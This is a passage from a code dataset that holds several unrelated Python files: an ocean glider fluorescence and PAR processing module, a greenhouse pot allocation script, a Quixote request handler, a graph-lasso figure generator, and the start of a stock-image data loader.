profile)\n 2. fluorescence_dark_count (factory correction)\n 3. seperate_spikes (using Briggs et al. 2011 - rolling min--max)\n 4. photic_depth (find photic depth based on PAR)\n 5. quenching_correction (corrects for quenching with Thomalla et al. 2017)\n 6. neighbourhood_iqr (find the outliers based on the interquartile range)\n\n INPUT\n -----\n All inputs must be ungridded np.ndarray or pd.Series data\n flr_raw raw output from backscatter 470 nm\n bbp processed backscatter from less noisy channel\n dives the dive count (round is down dives, 0.5 up dives)\n depth in metres\n time as a np.datetime64 array\n lat, lon latitude and longitude\n\n dark_count factory values from the cal sheet\n scale_factor factory values from the cal sheet\n spike_window the window size over which to run the despiking\n spike_method whether to use a rolling median or combination of min+max filter\n par PAR is optional, if not given quenching depth search is limited to 100m\n quenching_layer user specified version of determining quenching depth\n night_day_group If True, use night after otherwise use night before for flr:bbp ratio\n sunrise_sunset_offset the delayed onset and recovery of quenching in hours [1] (assumes symmetrical)\n profiles_ref_depth the reference depth to determine bad profiles\n method whether to use the deep median or deep mean to determine bad profiles\n\n return_figure return a figure object that shows the before and after\n verbose will print the progress of the processing\n\n OUTPUT\n ------\n baseline uncorrected, but despiked fluorescence\n quench_corrected quench corrected fluorescence\n quench_layer the quenching layer as a mask\n figs figures reporting the despiking and quenching correction\n \"\"\"\n\n from numpy import array, nan, count_nonzero, unique\n from . 
import optics as op\n from .cleaning import despike, despiking_report\n\n flr_raw = array(flr_raw)\n bbp = array(bbp)\n par = array(par)\n dives = array(dives)\n depth = array(depth)\n time = array(time)\n lat = array(lat)\n lon = array(lon)\n ref_depth = profiles_ref_depth\n stdev_multiplier = deep_multiplier\n method = deep_method\n\n dive_count = count_nonzero(unique(dives))\n\n if verbose:\n print('\\n' + '=' * 50 + '\\nFluorescence\\n\\tMask bad profiles based on deep values (ref depth={}m)'.format(ref_depth))\n bad_profiles = op.find_bad_profiles(dives, depth, flr_raw, ref_depth, stdev_multiplier, method)\n flr_raw[bad_profiles[0]] = nan\n\n bad_count = count_nonzero(bad_profiles[1])\n\n if verbose:\n print('\\tNumber of bad profiles = {}/{}'.format(bad_count, dive_count))\n\n if verbose:\n print('\\tDark count correction')\n\n flr_raw -= dark_count\n flr_dark = op.fluorescence_dark_count(flr_raw, depth)\n flr_dark[flr_dark < 0] = nan\n\n baseline, spikes = despike(flr_dark, spike_window, spike_method='median')\n\n if par is not None:\n if verbose:\n print('\\tCalculating the photic depth from PAR')\n photic_layer = op.photic_depth(par, dives, depth, return_mask=True)[0]\n else:\n photic_layer = None\n\n if verbose:\n print('\\tQuenching correction')\n quench_corrected, quench_layer = op.quenching_correction(\n baseline, bbp, dives, depth, time, lat, lon,\n photic_layer=photic_layer,\n quenching_layer=quenching_layer,\n sunrise_sunset_offset=1,\n night_day_group=True)\n\n if verbose:\n print(\"\\tSpike identification (spike window={})\".format(spike_window))\n\n if return_figure:\n if verbose:\n print('\\tGenerating figures for despiking and quenching report')\n figs = despiking_report(dives, depth, flr_raw, baseline.data, spikes, name='Fluorescence'),\n figs += op.quenching_report(baseline.data, quench_corrected.data, quench_layer, dives, depth),\n return baseline, quench_corrected, quench_layer, figs\n else:\n return baseline, quench_corrected, quench_layer\n\n\ndef calc_par(par_raw, dives, depth, time, scale_factor_wet_uEm2s, sensor_output_mV, replace_surface_depth=2, curve_max_depth=80, verbose=True):\n \"\"\"\n INFORMATION\n -----------\n Calculates the theoretical PAR based on an exponential curve fit.\n\n The processing steps are:\n 1. par_scaling (factory cal sheet scaling)\n 2. par_dark_count (correct deep par values to 0 using 5th %)\n 3. par_fill_surface (return the theoretical curve of par based exponential fit)\n\n INPUT\n -----\n All inputs must be ungridded np.ndarray or pd.Series data\n par_raw raw PAR\n dives the dive count (round is down dives, 0.5 up dives)\n depth in metres\n time as a np.datetime64 array\n \"\"\"\n\n from numpy import array\n from . 
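Both calc_backscatter and calc_fluorescence lean on cleaning.despike, which is only imported here. A hedged sketch of the rolling-median variant, plus the min--max variant the docstrings attribute to Briggs et al. (2011); the real implementation's window and edge handling may differ:

```python
# Minimal sketch of baseline/spike separation: a rolling median (or a running
# minimum followed by a running maximum) gives the baseline, and the residual
# is treated as spikes. Not the package's actual code.
import numpy as np
import pandas as pd

def despike(y, window=7, spike_method="median"):
    y = pd.Series(np.asarray(y, dtype=float))
    if spike_method == "median":
        baseline = y.rolling(window, center=True, min_periods=1).median()
    else:  # min--max filter pair
        mins = y.rolling(window, center=True, min_periods=1).min()
        baseline = mins.rolling(window, center=True, min_periods=1).max()
    spikes = y - baseline
    return baseline.values, spikes.values

if __name__ == "__main__":
    sig = np.ones(50)
    sig[25] = 10.0  # a single spike
    base, spk = despike(sig, window=7)
    print(round(base[25], 2), round(spk[25], 2))  # 1.0 9.0
```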
import optics as op\n\n par_raw = array(par_raw)\n dives = array(dives)\n depth = array(depth)\n time = array(time)\n\n if verbose:\n print('\\n' + '=' * 50 + '\\nPAR\\n\\tDark correction')\n\n # dark correction for par\n par_scaled = op.par_scaling(par_raw, scale_factor_wet_uEm2s, sensor_output_mV)\n par_dark = op.par_dark_count(par_scaled, dives, depth, time)\n if verbose:\n print('\\tFitting exponential curve to data')\n par_filled = op.par_fill_surface(par_dark, dives, depth, max_curve_depth=curve_max_depth)\n par_filled[par_filled < 0] = 0\n\n photic_depth = op.photic_depth(par_filled, dives, depth, ref_percentage=1, return_mask=False)\n\n return par_filled, photic_depth\n\n\nif __name__ == '__main__':\n pass\n","sub_path":"buoyancy_glider_utils/processing.py","file_name":"processing.py","file_ext":"py","file_size_in_byte":17908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"481362734","text":"def experimental_objects_allocation(n_row, n_col, light_effect, temperature_effect, light_weight, temperature_weight, genotype_num, replicate_num, energy_weight, distance_weight, output_path):\n \n from random import sample\n import time\n import pandas as pd\n import numpy as np\n\n spatial_light_effect = np.zeros((n_row,n_col))\n \n for i, col in enumerate(spatial_light_effect):\n for j, col in enumerate(spatial_light_effect.T):\n\n spatial_light_effect[i,:] = np.exp(i**light_effect)\n \n spatial_light_effect_norm = spatial_light_effect/spatial_light_effect.sum()\n \n \n \n spatial_temperature_effect = np.zeros((n_row,n_col))\n\n for i, row in enumerate(spatial_temperature_effect):\n for j, col in enumerate(spatial_temperature_effect.T):\n\n spatial_temperature_effect[i,j] = np.exp(i**(temperature_effect))+np.exp(j**(temperature_effect))\n\n spatial_temperature_effect_norm = spatial_temperature_effect/spatial_temperature_effect.sum() \n\n #Combine light and temperature effect as environmenatl effect\n spatial_enviromental_effect = light_weight*spatial_light_effect + temperature_weight*spatial_temperature_effect\n spatial_enviromental_effect_norm = spatial_enviromental_effect/spatial_enviromental_effect.sum()\n \n #Find not convenient locations -> with highest enviromental effect (We know that there is 45 free positions)\n\n position_allocation = np.zeros((n_row,n_col))\n\n def largest_indices(ary, n):\n \"\"\"Returns the n largest indices from a numpy array.\"\"\"\n flat = ary.flatten()\n indices = np.argpartition(flat, -n)[-n:]\n indices = indices[np.argsort(-flat[indices])]\n\n return np.unravel_index(indices, ary.shape)\n \n\n #Find X-most effected spots\n coords = largest_indices(spatial_enviromental_effect, n_row*n_col - genotype_num*replicate_num)\n #and permit them for alocation\n position_allocation[coords] = None\n\n #Compute spot energy if enviromental conditions would be equivalent for whole are\n energy_equi = spatial_enviromental_effect_norm[np.where(position_allocation == 0)].sum() / np.where(position_allocation == 0)[0].shape[0]\n\n #define triplet energy vector\n energy_triplet = np.array((energy_equi,energy_equi,energy_equi))\n\n\n genotypes = list(range(1,genotype_num+1))\n \n class pair_allocation():\n \n def __init__(self, crit, position_1, position_2):\n\n self.crit = crit\n self.position_1 = position_1\n self.position_2 = position_2\n \n \n while genotypes:\n \n #randomly select genotype\n gen = sample(genotypes,1)\n gen = gen[0]\n\n #remove genotype from a list of genotypes\n genotypes.remove(gen) \n\n #free 
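op.par_fill_surface is described above only as "the theoretical curve of par based exponential fit". A self-contained illustration of that idea with scipy.optimize.curve_fit; the one-term decay model and the starting values below are assumptions, not the package's actual code:

```python
# Hedged sketch of an exponential PAR profile fit: PAR(z) = PAR0 * exp(-k z).
import numpy as np
from scipy.optimize import curve_fit

def fit_par_profile(par, depth):
    model = lambda z, par0, k: par0 * np.exp(-k * z)
    (par0, k), _ = curve_fit(model, depth, par, p0=(par.max(), 0.05))
    return par0, k

if __name__ == "__main__":
    z = np.linspace(0, 80, 40)
    rng = np.random.default_rng(0)
    par = 1500 * np.exp(-0.06 * z) + rng.normal(0, 5, z.size)
    par0, k = fit_par_profile(par, z)
    print(round(par0), round(k, 3))  # close to 1500 and 0.06
```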
positions\n free_coords = np.where(position_allocation == 0)\n\n #randomly select spot for first replicate\n index = sample(range(0,free_coords[0].shape[0]),1)\n\n #position coords\n first_position = (free_coords[0][index],free_coords[1][index]) \n\n position_allocation[first_position[0], first_position[1]] = gen\n\n #Enviromental energy on position of first alocated replicate\n first_energy = spatial_enviromental_effect_norm[first_position[0],first_position[1]]\n\n #free positions\n free_coords = np.where(position_allocation == 0)\n\n evaluated_pairs = []\n\n for i in range(0,free_coords[0].shape[0]):\n\n for j in range(0,free_coords[0].shape[0]):\n\n if(not i==j): \n\n second_position = (free_coords[0][i],free_coords[1][i]) \n third_position = (free_coords[0][j],free_coords[1][j])\n\n second_energy = spatial_enviromental_effect_norm[second_position[0],second_position[1]] \n third_energy = spatial_enviromental_effect_norm[third_position[0],third_position[1]] \n\n\n energy_crit = 1/(abs(energy_triplet.sum()-first_energy-second_energy-third_energy))\n\n distance_crit = (((first_position[0]-second_position[0])**2 + (first_position[1]-second_position[1])**2)**(0.5))+(((first_position[0]-third_position[0])**2 + (first_position[1]-third_position[1])**2)**(0.5))+(((third_position[0]-second_position[0])**2 + (third_position[1]-second_position[1])**2)**(0.5))\n\n evaluated_pair = pair_allocation(energy_weight*energy_crit+distance_weight*distance_crit,second_position,third_position)\n evaluated_pairs.append(evaluated_pair)\n\n\n evaluated_pairs_sorted = sorted(evaluated_pairs, key=lambda pair: pair.crit, reverse = True)\n\n position_allocation[evaluated_pairs_sorted[0].position_1[0],evaluated_pairs_sorted[0].position_1[1]] = gen\n position_allocation[evaluated_pairs_sorted[0].position_2[0],evaluated_pairs_sorted[0].position_2[1]] = gen\n\n\n\n ## convert your array into a dataframe\n df = pd.DataFrame(position_allocation)\n\n ## save to xlsx file\n\n df.to_excel(output_path + 'genotypes_spatial_distribution.xlsx', index=True)","sub_path":"greenhouse_pot_allocation.py","file_name":"greenhouse_pot_allocation.py","file_ext":"py","file_size_in_byte":5132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"591428991","text":"# coding: utf-8\nimport quixote\nfrom quixote.directory import Directory\n\ntry:\n from html import escape ## Py3\nexcept ImportError:\n from cgi import escape ## Py2\n\n#/\nclass Main_H(Directory):\n ## |H| means request handler.\n\n _q_exports = ['']\n\n def _q_index(self, *args, **kwargs):\n #/\n line_s = []\n\n #/\n line_s.append('#/ Quixote')\n line_s.append('Main_H._q_index: {} {}'.format(args, kwargs))\n\n #/\n line_s.append('\\n#/ quixote.get_request().environ')\n for key, val in sorted(quixote.get_request().environ.copy().items(), key=lambda x: x[0]):\n line_s.append('{:40}{}'.format(key, val))\n\n #/\n line_s.append('\\n#/ globals()')\n for key, val in sorted(globals().copy().items(), key=lambda x: x[0]):\n if key != '__builtins__':\n line_s.append('{:40}{:50}{}'.format(key, str(type(val)), str(val)))\n\n #/\n txt = '\\n'.join(line_s)\n txt = escape(txt, quote=True)\n\n txt = \\\n\"\"\"\n\n\n\n\n\n
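The largest_indices helper above is easy to verify in isolation; here it is extracted as-is with a tiny check that the returned coordinates come back ordered by descending value:

```python
# Standalone check of the largest_indices helper used in the allocation code.
import numpy as np

def largest_indices(ary, n):
    """Returns the n largest indices from a numpy array."""
    flat = ary.flatten()
    indices = np.argpartition(flat, -n)[-n:]
    indices = indices[np.argsort(-flat[indices])]
    return np.unravel_index(indices, ary.shape)

if __name__ == "__main__":
    a = np.array([[1, 9], [7, 3]])
    for r, c in zip(*largest_indices(a, 2)):
        print(r, c)  # (0, 1) then (1, 0) -> values 9 and 7
```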
%s
\n\n\n\"\"\" % (txt,)\n\n return txt\n\nclass Next_H(Directory):\n ## |H| means request handler.\n\n _q_exports = ['']\n\n def _q_index(self):\n url_path = quixote.get_request().get_path()\n\n url_qs = quixote.get_request().get_query()\n\n txt = 'Quixote: |{}{}|'.format(url_path, '?'+url_qs if url_qs else '')\n\n return txt\n","sub_path":"src/aoikquixotestart/hdlrs.py","file_name":"hdlrs.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"117927705","text":"\n# coding: utf-8\n\n# In[1]:\n\nimport covariance_learn\nimport itertools\nimport phase_transition\nimport htree\nimport joblib\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport scipy.linalg\nimport scipy.special\nfrom functools import partial\nfrom sklearn.utils import check_random_state\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom joblib import Parallel, delayed\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\n\n\ndef alpha_func_(h, max_level):\n return partial(covariance_learn._alpha_func, h=h, max_level=max_level)\n\n\ndef cov2corr(cov):\n return np.diag(1 / np.sqrt(np.diag(cov))).dot(\n cov.dot(np.diag(1 / np.sqrt(np.diag(cov)))))\n\n\ndef estimate_precision(alpha, h=None, method='hgl', max_level=None,\n title=None):\n if max_level is None:\n max_level = max([lev for (_, lev) in tree.root_.get_descendants()])\n alpha_func = alpha_func_(h=h, max_level=max_level)\n if method == 'gl':\n covl = covariance_learn.GraphLasso(alpha=alpha, score_norm='KL',\n max_iter=1e4, rho=2)\n elif method == 'hgl':\n covl = covariance_learn.HierarchicalGraphLasso(alpha=alpha, htree=tree,\n alpha_func=alpha_func,\n score_norm='KL',\n max_iter=1e4, rho=2)\n covl.fit(X)\n K = covl.precision_\n fig, (ax1, ax2) = plt.subplots(1, 2)\n ax1.matshow(np.ma.masked_equal(K * (covl.auxiliary_prec_ != 0), 0),\n cmap=plt.cm.RdBu_r, vmin=-np.max(np.abs(K)) / 5.,\n vmax=np.max(np.abs(K)) / 5.)\n ax1.set_title('Estimated precision')\n ax1.set_axis_bgcolor('.7')\n ax2.matshow(np.array(covl.auxiliary_prec_ != 0, dtype=float),\n cmap=plt.cm.gray, vmin=0, vmax=1)\n ax2.set_title('Support (derived from split variable)')\n fig.suptitle(title)\n fig, ax = plt.subplots()\n plt.plot(covl.f_vals_, 'b-')\n plt.title(\"Jensen's divergence = {}\".format(covl.score(Y)))\n ax.set_ylabel('energy', color='b')\n for tl in ax.get_yticklabels():\n tl.set_color('b')\n ax2 = ax.twinx()\n ax2.semilogy(covl.var_gap_, 'g-')\n ax2.semilogy(covl.dual_gap_, 'g--')\n ax2.set_ylabel('split diff & dual update norm', color='g')\n for tl in ax2.get_yticklabels():\n tl.set_color('g')\n fig.suptitle(title)\n plt.show()\n\n\ndef grid_evaluation(X, Y, n_h=11, n_a=11):\n h_vals = np.linspace(0., 1., n_h)\n h_ix = np.arange(n_h)\n alpha_vals = np.logspace(-3., 0., n_a)\n a_ix = np.arange(n_a)\n scores = {'KL': np.zeros((n_h, n_a)), 'ell0': np.zeros((n_h, n_a))}\n score_gl = {'KL': np.zeros((n_h, n_a)), 'ell0': np.zeros((n_h, n_a))}\n\n alpha_star = {'hgl': dict(), 'gl': dict()}\n h_star = {'hgl': dict(), 'gl': dict()}\n\n for (ix, vals) in zip(itertools.product(h_ix, a_ix),\n itertools.product(h_vals, alpha_vals)):\n for score_norm in {'KL', 'ell0'}:\n if ix[0] == 0:\n covl = covariance_learn.GraphLasso(\n alpha=vals[1], score_norm=score_norm, max_iter=1e4,\n rho=2.)\n score_gl[score_norm][..., ix[1]] = covl.fit(X).score(Y)\n covl = covariance_learn.HierarchicalGraphLasso(\n alpha=vals[1], htree=tree,\n alpha_func=alpha_func_(h=vals[0], max_level=max_level),\n score_norm=score_norm, 
max_iter=1e4, rho=2.)\n scores[score_norm][ix] = covl.fit(X).score(Y)\n\n X_, Y_ = np.meshgrid(h_vals, alpha_vals)\n for score in scores.keys():\n alpha_star['hgl'][score] = Y_.flat[np.argmin(scores[score].T)]\n h_star['hgl'][score] = X_.flat[np.argmin(scores[score].T)]\n arg_min_alpha = np.argmin(score_gl[score][0, ...])\n arg_min_h = np.argmin(scores[score][arg_min_alpha, ...])\n h_star['gl'][score] = h_vals[arg_min_h]\n alpha_star['gl'][score] = alpha_vals[arg_min_alpha]\n return scores, score_gl, alpha_star, h_star\n\n\ndef plot_grid(scores=None, score_gl=None, score='KL', transpose=True,\n zlims=None, z_offset=None, y_offset=None, x_offset=None,\n print_title=False, invert_x=False, invert_y=False, fsize=18):\n fig = plt.figure()\n if scores is not None and score_gl is not None:\n if score == 'KL':\n plot_scores = np.log(scores[score] / score_gl[score])\n title = \"log-difference of Jensen's divergence:\" +\\\n \"log J(hgl) - log J(gl)\"\n score_title = 'Jmin'\n elif score == 'ell0':\n plot_scores = scores[score] - score_gl[score]\n title = \"support mismatch difference: ell0(hgl) - ell0(gl)\"\n score_title = 'ell0min'\n elif scores is not None or score_gl is not None:\n if scores is not None:\n title = \"[HGL] \"\n plot_scores = scores[score]\n else:\n title = \"[GL] \"\n plot_scores = score_gl[score]\n if score == 'KL':\n title += \"Jensen's divergence\"\n score_title = \"Jmin\"\n elif score == 'ell0':\n title += \"support mismatch\"\n score_title = \"ell0min\"\n else:\n raise ValueError('Neither scores, nor score_gl are defined: ' +\n 'nothing to plot')\n\n h_vals = np.linspace(0., 1., plot_scores.shape[0])\n alpha_vals = np.logspace(-3., 0., plot_scores.shape[1])\n X_, Y_ = np.meshgrid(h_vals, alpha_vals)\n\n if transpose:\n plot_scores = plot_scores.T\n xlabel = 'h'\n ylabel = r'$\\lambda$'\n else:\n ylabel = 'h'\n xlabel = r'$\\lambda$'\n\n if invert_x:\n plot_scores = plot_scores[::-1, ...]\n X_ = X_[::-1, ...]\n Y_ = Y_[::-1, ...]\n if invert_y:\n plot_scores = plot_scores[..., ::-1]\n Y_ = Y_[..., ::-1]\n X_ = X_[..., ::-1]\n\n ax = fig.gca(projection='3d')\n ax.plot_surface(X_, Y_, plot_scores, rstride=1, cstride=1,\n cmap=plt.cm.coolwarm, linewidth=0, antialiased=False)\n if x_offset is None:\n x_offset = ax.get_xlim()[1]\n if y_offset is None:\n y_offset = ax.get_ylim()[0]\n if z_offset is None:\n z_offset = ax.get_zlim()[0]\n ax.contour(X_, Y_, plot_scores, zdir='z', offset=z_offset,\n cmap=plt.cm.coolwarm)\n ax.contour(X_, Y_, plot_scores, zdir='x', offset=x_offset,\n cmap=plt.cm.coolwarm)\n ax.contour(X_, Y_, plot_scores, zdir='y', offset=y_offset,\n cmap=plt.cm.coolwarm)\n if zlims is not None:\n ax.set_zlim(zlims)\n ax.set_xlabel(xlabel, fontsize=fsize)\n ax.set_ylabel(ylabel, fontsize=fsize)\n if print_title:\n ax.set_zlabel(title, fontsize=fsize)\n if print_title and scores is not None and score_gl is not None:\n ax.set_title(score_title + '(hgl: lambda={}, h={}) = {}, '.format(\n Y_.flat[np.argmin(scores[score].T)],\n X_.flat[np.argmin(scores[score].T)],\n np.min(scores[score])) +\n score_title + '(gl: lambda={}) = {}'.format(\n Y_.flat[np.argmin(score_gl[score].T)],\n np.min(score_gl[score])))\n elif print_title and scores is not None:\n ax.set_title(score_title + '(hgl: lambda={}, h={}) = {}'.format(\n Y_.flat[np.argmin(scores[score].T)],\n X_.flat[np.argmin(scores[score].T)],\n np.min(scores[score])))\n elif print_title and score_gl is not None:\n ax.set_title(score_title + '(gl: lambda={}) = {}'.format(\n Y_.flat[np.argmin(score_gl[score].T)],\n 
np.min(score_gl[score])))\n plt.show()\n\n\ndef plot_covariances(X, Theta, Y=None):\n if Y is None:\n eigvals, eigvecs = scipy.linalg.eigh(Theta)\n Y = eigvecs.dot(np.diag(1 / np.sqrt(eigvals))).dot(eigvecs.T)\n plt.figure()\n plt.subplot(221)\n plt.matshow(Theta, cmap=plt.cm.RdBu_r, fignum=False)\n plt.clim((-1, 1))\n plt.title('population precision matrix')\n plt.colorbar()\n\n plt.subplot(222)\n sample_prec = scipy.linalg.inv(cov2corr(X.T.dot(X)))\n plt.matshow(sample_prec, cmap=plt.cm.RdBu_r,\n fignum=False)\n max_plot = np.max(np.abs(sample_prec)) / 5.\n plt.clim((-max_plot, max_plot))\n plt.title('sample (n={}) precision matrix'.format(X.shape[0]))\n plt.colorbar()\n\n plt.subplot(223)\n plt.matshow(cov2corr(Y.T.dot(Y)), cmap=plt.cm.RdBu_r, fignum=False)\n plt.clim((-1, 1))\n plt.title('population correlation matrix')\n plt.colorbar()\n\n plt.subplot(224)\n plt.matshow(cov2corr(X.T.dot(X)), cmap=plt.cm.RdBu_r, fignum=False)\n plt.clim((-1, 1))\n plt.title('sample correlation matrix')\n plt.colorbar()\n plt.show()\n\n\ndef plot_covariance(cov, scaled=True, aux=None, diag=True, grid=True):\n cov_ = cov.copy()\n if scaled:\n from covariance_learn import _cov_2_corr as cov2corr\n cov_ = cov2corr(cov_)\n if not diag:\n cov_.flat[::cov_.shape[0] + 1] = 0.\n plt.figure()\n ax = plt.gca()\n if aux is None:\n aux = np.ones(cov_.shape)\n im = plt.matshow(np.ma.masked_equal(aux, 0) * cov_, cmap=plt.cm.RdBu_r,\n fignum=False)\n ax.set_axis_bgcolor('.4')\n ax.set_xticklabels([])\n ax.set_yticklabels([])\n divider = make_axes_locatable(ax)\n if cov_.shape[0] == 16 and grid:\n for k in np.arange(4 - 1):\n plt.plot([-.5, 15.5], [4 * (k + 1) - .5, 4 * (k + 1) - .5],\n linewidth=2, color='black')\n plt.plot([4 * (k + 1) - .5, 4 * (k + 1) - .5], [-.5, 15.5],\n linewidth=2, color='black')\n plt.xlim((-.5, 15.5))\n plt.ylim((15.5, -.5))\n elif cov_.shape[0] == 512 and grid:\n for k in np.arange(64 - 1):\n plt.plot([-.5, 512.5], [8 * (k + 1) - .5, 8 * (k + 1) - .5],\n linewidth=1 + int(not((k + 1) % 8)), color='black')\n plt.plot([8 * (k + 1) - .5, 8 * (k + 1) - .5], [-.5, 512.5],\n linewidth=1 + int(not((k + 1) % 8)), color='black')\n plt.xlim((-.5, 512.5))\n plt.ylim((512.5, -.5))\n m = np.max(np.abs(cov_))\n plt.clim((-m, m))\n cax = divider.append_axes('right', size='5%', pad=.05)\n cb = plt.colorbar(im, cax=cax)\n cb.ax.tick_params(labelsize=18)\n\n\ndef plot_profiles(alpha=1., h=.8, max_level=4, levels=None):\n if levels is None:\n levels = np.arange(1, max_level + 1)\n plt.figure()\n plt.plot(levels, covariance_learn._alpha_func(alpha=alpha, lev=levels, h=h,\n max_level=max_level))\n plt.show()\n\n\ndef lambda_path(n_samples, C, tree):\n n_bootstraps = 10\n X = np.random.normal(size=(np.max(n_samples) * n_bootstraps, C.shape[1]))\n results = Parallel(n_jobs=min(len(n_samples), 20))(\n delayed(covariance_learn.cross_val)(\n X, method='hgl', n_iter=n_bootstraps,\n train_size=np.float(n) / (np.max(n_samples) * n_bootstraps),\n model_prec=Theta, optim_h=True, htree=tree)\n for n in n_samples)\n alpha_opt_, LL_, h_opt_ = zip(*results)\n return alpha_opt_, h_opt_\n\n\ndef init(random_state=None, a=-.4, b=.28, n_samples=16):\n if random_state is None:\n random_state = np.random.randint(2 ** 31 - 1)\n random_state = check_random_state(random_state)\n\n tree = htree.construct_tree(arity=4, depth=2)\n\n # Create sample\n Theta = phase_transition._get_mx(a, b, mx_type='smith')\n X = random_state.normal(size=(n_samples, Theta.shape[0]))\n\n return tree, X, Theta\n\n\ndef get_max_level(tree):\n return max([lev 
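cov2corr, defined near the top of this module, is used throughout the plotting helpers; a quick sanity check with the function copied as written:

```python
# Converting a covariance matrix to a correlation matrix should put ones on
# the diagonal and scale off-diagonals by the product of standard deviations.
import numpy as np

def cov2corr(cov):
    d = np.diag(1 / np.sqrt(np.diag(cov)))
    return d.dot(cov).dot(d)

if __name__ == "__main__":
    cov = np.array([[4.0, 2.0], [2.0, 9.0]])
    corr = cov2corr(cov)
    print(np.diag(corr))         # [1. 1.]
    print(round(corr[0, 1], 3))  # 2 / (2 * 3) = 0.333
```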
for (_, lev) in tree.root_.get_descendants()])\n\n\nif __name__ == \"__main__\":\n tree, X, Theta = init()\n max_level = get_max_level(tree)\n\n eigvals, eigvecs = scipy.linalg.eigh(Theta)\n C = np.diag(1 / np.sqrt(eigvals)).dot(eigvecs.T)\n\n X = X.dot(C)\n Y = C\n\n scores, score_gl, alpha_star, h_star = grid_evaluation(\n X, Y, n_a=21, n_h=21)\n\n n_samples = np.logspace(1., 3., 9)\n alpha_opt_, h_opt_ = lambda_path(n_samples, C, tree)\n\n joblib.dump({'scores': scores,\n 'score_gl': score_gl,\n 'alpha_star': alpha_star,\n 'h_star': h_star,\n 'n_samples': n_samples,\n 'alpha_opt_': alpha_opt_,\n 'h_opt_': h_opt_},\n 'results_.pkl')\n raise StopIteration\n plot_covariances(X, Theta, Y)\n\n estimate_precision(alpha=alpha_star['hgl']['KL'], h=h_star['hgl']['KL'],\n method='hgl',\n title=r'($\\lambda^{*}_{hgl}$, $h^{\\star}_{hgl}$)')\n estimate_precision(\n alpha=alpha_star['gl']['KL'], h=h_star['gl']['KL'], method='hgl',\n title=r'($\\lambda^{*}_{gl}, h^{\\star}_{hgl}|_{\\lambda^{\\star}_{gl}}$)')\n estimate_precision(alpha=alpha_star['hgl']['KL'], method='gl',\n title=r'($\\lambda^{*}_{hgl}$, 0)')\n estimate_precision(alpha=alpha_star['gl']['KL'], method='gl',\n title=r'($\\lambda^{*}_{gl}$, 0)')\n\n plot_grid(scores=scores, score='KL', transpose=True)\n plot_grid(scores=scores, score_gl=score_gl, score='KL', transpose=True)\n\n plot_grid(scores=scores, score='ell0', transpose=True)\n plot_grid(scores=scores, score_gl=score_gl, score='ell0', transpose=True)","sub_path":"figure_generator.py","file_name":"figure_generator.py","file_ext":"py","file_size_in_byte":13337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"228579617","text":"import os\nimport pandas as pd\nimport numpy as np\nimport preprocessing\nimport clustering\nimport classes\nimport metrics as mt\nimport time\n\nfrom helper import *\n\ndef get_train_data(stock_names, read_path=\"../sanity_input/train/images_with_labels\", labels_are_last=1, save_path=\"../sanity_input/train/last_saved_data\"):\n \n if os.path.isfile(save_path+\"/last_saved.pickle\"):\n return pd.read_pickle(save_path+\"/last_saved.pickle\")\n \n all_train_images = []\n all_train_labels = []\n all_train_names = []\n all_train_dates=[]\n\n # todo: burada şu string colomn işini çöz\n for stock in stock_names:\n data_df = pd.read_csv(read_path + \"/{}.csv\".format(stock), header=None)\n names = data_df.iloc[:, 0] # first element\n dates = data_df.iloc[:, 1] # second element\n images = data_df.iloc[:, 2:-labels_are_last] # remaining elements\n labels = data_df.iloc[:, -labels_are_last:] # last elements\n\n print(\"all images are merging with {} ...\".format(stock))\n\n # determine where to split\n train_image_count = images.shape[0]\n\n # split train and test\n # for 16 year of data : nearly 14 year train-last 2 year test\n train_images = images.iloc[0:train_image_count]\n train_labels = labels.iloc[0:train_image_count]\n train_names = names.iloc[0:train_image_count]\n train_dates = dates.iloc[0:train_image_count]\n\n # todo: need to make data class because above not seems good. 
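get_train_data above short-circuits through a pickle cache before rebuilding the merged frame. The same pattern in miniature, with a placeholder path and builder (both hypothetical, chosen only to make the sketch runnable):

```python
# Compute-once caching via pandas pickle helpers: reuse the pickled result
# when present, otherwise build and persist it.
import os
import tempfile
import pandas as pd

def cached(path, build):
    if os.path.isfile(path):
        return pd.read_pickle(path)
    data = build()
    pd.to_pickle(data, path)
    return data

if __name__ == "__main__":
    path = os.path.join(tempfile.gettempdir(), "demo_cache.pickle")
    print(cached(path, lambda: {"x": [1, 2, 3]}))  # built on first run
    print(cached(path, lambda: {"x": "ignored"}))  # served from the cache
```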
-ugurgudelek\n\n if len(all_train_images) == 0:\n all_train_images = np.array(train_images)\n all_train_labels = train_labels.values\n all_train_names = np.array(train_names)\n all_train_dates = np.array(train_dates)\n else:\n all_train_images = np.append(all_train_images, train_images, axis=0)\n all_train_labels = np.append(all_train_labels, train_labels.values, axis=0)\n all_train_names = np.append(all_train_names,train_names, axis=0)\n all_train_dates = np.append(all_train_dates,train_dates, axis=0)\n\n print(\"current train shape is {} and {} label \".format(pd.DataFrame(all_train_images).shape,\n all_train_labels.shape[1]))\n \n print(\"Sorting train data by date and name...\")\n sorted_train_data = pd.DataFrame()\n sorted_train_data['date'] = all_train_dates\n sorted_train_data['name'] = all_train_names\n sorted_train_data['image'] = [i for i in all_train_images]\n sorted_train_data['label'] = all_train_labels\n sorted_train_data = sorted_train_data.sort_values(by = ['date', 'name'])\n \n data = {'train_images': pd.DataFrame(np.asarray([i for i in sorted_train_data['image']])),\n 'train_labels': pd.DataFrame(sorted_train_data['label'].values),\n 'train_names': pd.DataFrame(sorted_train_data['name'].values),\n 'train_dates': pd.DataFrame(sorted_train_data['date'].values)\n } \n\n if not os.path.exists(save_path):\n os.makedirs(save_path)\n\n pd.to_pickle(data, save_path+\"/last_saved.pickle\")\n\n return data\n\ndef fast_normalize_and_calculate_metrics(train_stock, fresh_stock):\n train_stock.loc[:,'name'] = [''] * train_stock.shape[0]\n train_stock.loc[:,'pct_change_tanh'] = [0.0] * train_stock.shape[0]\n\n stock = train_stock.append(fresh_stock, ignore_index=True).drop(['name', 'pct_change_tanh'], axis=1)\n\n # create data arr to hold all metric info\n metric_data, metric_function_names = preprocessing.calculate_metrics(stock)\n\n # assign nan value beginning of the data\n 